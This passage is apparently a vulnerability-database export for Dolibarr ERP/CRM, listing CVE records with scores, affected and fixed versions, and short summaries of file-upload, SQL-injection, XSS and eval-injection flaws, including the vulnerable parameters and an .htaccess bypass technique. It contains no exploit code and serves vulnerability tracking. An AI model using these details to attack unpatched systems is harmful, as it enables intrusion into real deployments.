| scoring_system |
epss |
| scoring_elements |
0.34751 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00146 |
| scoring_system |
epss |
| scoring_elements |
0.34787 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00146 |
| scoring_system |
epss |
| scoring_elements |
0.34771 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2020-14201 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@11.0.5 |
| purl |
pkg:composer/dolibarr/dolibarr@11.0.5 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 9 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 10 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 11 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 12 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 13 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 14 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 15 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 16 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 17 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 18 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 19 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 20 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 21 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 22 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 23 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 24 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 25 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 26 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 27 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 28 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 29 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 30 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 31 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 32 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 33 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 34 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 35 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 36 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5 |
|
|
| aliases |
CVE-2020-14201, GHSA-25h3-mw3p-w8r7
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-nnth-kevf-vybz |
|
| 44 |
| url |
VCID-pejz-pskb-aqbg |
| vulnerability_id |
VCID-pejz-pskb-aqbg |
| summary |
Unrestricted Upload of File with Dangerous Type
Dolibarr allows low-privilege users to upload files of dangerous types, leading to arbitrary code execution. This occurs because `.pht` and `.phar` files can be uploaded. Also, an `.htaccess` file can be uploaded to reconfigure access control (e.g., to let `.noexe` files be executed as PHP code to defeat the `.noexe` protection mechanism). |
| references |
| 0 |
|
| 1 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2020-14209 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.10166 |
| scoring_system |
epss |
| scoring_elements |
0.9326 |
| published_at |
2026-06-05T12:55:00Z |
|
| 1 |
| value |
0.10166 |
| scoring_system |
epss |
| scoring_elements |
0.93249 |
| published_at |
2026-06-04T12:55:00Z |
|
| 2 |
| value |
0.10166 |
| scoring_system |
epss |
| scoring_elements |
0.93261 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.10166 |
| scoring_system |
epss |
| scoring_elements |
0.93259 |
| published_at |
2026-06-07T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2020-14209 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@11.0.5 |
| purl |
pkg:composer/dolibarr/dolibarr@11.0.5 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 7 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 8 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 9 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 10 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 11 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 12 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 13 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 14 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 15 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 16 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 17 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 18 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 19 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 20 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 21 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 22 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 23 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 24 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 25 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 26 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 27 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 28 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 29 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 30 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 31 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 32 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 33 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 34 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 35 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 36 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5 |
|
|
| aliases |
CVE-2020-14209, GHSA-2gcp-xwxg-hqg3
|
| risk_score |
10.0 |
| exploitability |
2.0 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-pejz-pskb-aqbg |
|
| 45 |
| url |
VCID-pfyf-s4fc-d3a8 |
| vulnerability_id |
VCID-pfyf-s4fc-d3a8 |
| summary |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
File Upload vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to execute arbitrary code and obtain sensitive information via the extension filtering and renaming functions. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track* |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-24T20:34:30Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2023-38887, GHSA-g8h7-mcp6-pf47
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-pfyf-s4fc-d3a8 |
|
| 46 |
| url |
VCID-qrcg-mnfa-k7gv |
| vulnerability_id |
VCID-qrcg-mnfa-k7gv |
| summary |
SQL Injection
Dolibarr `ERP/CRM` is affected by multiple SQL injection vulnerabilities via `comm/propal/list.php` (viewstatut parameter) or `comm/propal/list.php` (`propal_statut` parameter, aka `search_statut` parameter). |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2017-18260 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.44451 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.44507 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.44528 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.4452 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2017-18260 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 26 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 27 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 28 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 29 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 30 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 31 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 32 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 33 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 34 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 35 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 36 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 37 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 38 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 39 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 40 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 41 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 42 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 43 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 44 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 45 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 46 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 47 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 48 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 49 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 50 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 51 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 52 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 53 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 54 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 55 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1 |
|
|
| aliases |
CVE-2017-18260, GHSA-9986-6m4g-25f6
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-qrcg-mnfa-k7gv |
|
| 47 |
|
| 48 |
| url |
VCID-s3d1-hcmh-fucu |
| vulnerability_id |
VCID-s3d1-hcmh-fucu |
| summary |
SQL Injection
Dolibarr ERP/CRM is affected by an SQL injection in versions via `product/stats/card.php` (`type` parameter). |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9839 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.44451 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.44507 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.44528 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00218 |
| scoring_system |
epss |
| scoring_elements |
0.4452 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9839 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@5.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@5.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-11u2-56qq-cye4 |
|
| 1 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 2 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 3 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 4 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 5 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 6 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 7 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 8 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 9 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 10 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 11 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 12 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 13 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 14 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 15 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 16 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 17 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 18 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 19 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 20 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 21 |
| vulnerability |
VCID-9xkp-4t9p-eqbb |
|
| 22 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 23 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 24 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 25 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 26 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 27 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 28 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 29 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 30 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 31 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 32 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 33 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 34 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 35 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 36 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 37 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 38 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 39 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 40 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 41 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 42 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 43 |
| vulnerability |
VCID-qrcg-mnfa-k7gv |
|
| 44 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 45 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 46 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 47 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 48 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 49 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 50 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 51 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 52 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 53 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 54 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 55 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 56 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 57 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 58 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
| 59 |
| vulnerability |
VCID-zjqj-1zrx-yqh6 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@5.0.4 |
|
|
| aliases |
CVE-2017-9839, GHSA-84gh-4m36-cgqx
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-s3d1-hcmh-fucu |
|
| 49 |
| url |
VCID-s3xn-47cy-eucf |
| vulnerability_id |
VCID-s3xn-47cy-eucf |
| summary |
Cross site scripting in dolibarr
A Cross-site Scripting (XSS) vulnerability exists in the admin/accountant.php file. The fields `town`, `name`, and `Accountant code` can be used to escape double quote protection. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2022-2060 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00511 |
| scoring_system |
epss |
| scoring_elements |
0.668 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00511 |
| scoring_system |
epss |
| scoring_elements |
0.66832 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00511 |
| scoring_system |
epss |
| scoring_elements |
0.66848 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00511 |
| scoring_system |
epss |
| scoring_elements |
0.6684 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2022-2060 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2022-2060, GHSA-8fvr-7945-mg7w
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-s3xn-47cy-eucf |
|
| 50 |
| url |
VCID-srth-2stq-gyaq |
| vulnerability_id |
VCID-srth-2stq-gyaq |
| summary |
Dolibarr has an Injection issue
A vulnerability was identified in Dolibarr ERP CRM up to 23.0.2. This affects the function _checkValForAPI of the file htdocs/expedition/class/expedition.class.php of the component Shipments API Endpoint. The manipulation of the argument fields leads to sql injection. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. It is indicated that the exploitability is difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
5.0 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L |
|
| 1 |
| value |
1.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 2 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 2 |
|
| 3 |
| reference_url |
https://vuldb.com/submit/799337 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
4.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
5 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R |
|
| 2 |
| value |
5 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R |
|
| 3 |
| value |
5.0 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L |
|
| 4 |
| value |
1.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
2.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/ |
|
|
| url |
https://vuldb.com/submit/799337 |
|
| 4 |
| reference_url |
https://vuldb.com/vuln/360858 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
4.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
5 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R |
|
| 2 |
| value |
5 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R |
|
| 3 |
| value |
5.0 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L |
|
| 4 |
| value |
1.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
2.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/ |
|
|
| url |
https://vuldb.com/vuln/360858 |
|
| 5 |
| reference_url |
https://vuldb.com/vuln/360858/cti |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
4.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
5 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R |
|
| 2 |
| value |
5 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R |
|
| 3 |
| value |
5.0 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L |
|
| 4 |
| value |
1.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
2.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T19:47:51Z/ |
|
|
| url |
https://vuldb.com/vuln/360858/cti |
|
| 6 |
|
|
| fixed_packages |
|
| aliases |
CVE-2026-7688, GHSA-rvwr-q5hj-wq7g
|
| risk_score |
2.2 |
| exploitability |
0.5 |
| weighted_severity |
4.5 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-srth-2stq-gyaq |
|
| 51 |
| url |
VCID-tmv2-39y8-f7f1 |
| vulnerability_id |
VCID-tmv2-39y8-f7f1 |
| summary |
Dolibarr vulnerable to Eval Injection
Dolibarr ERP & CRM <=15.0.3 are vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval. |
| references |
| 0 |
|
| 1 |
|
| 2 |
| reference_url |
https://github.com/youncyb/dolibarr-rce |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
9.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
CRITICAL |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-05-15T15:00:17Z/ |
|
|
| url |
https://github.com/youncyb/dolibarr-rce |
|
| 3 |
|
| 4 |
|
|
| fixed_packages |
|
| aliases |
CVE-2022-40871, GHSA-7cm4-vmf2-8wf2
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
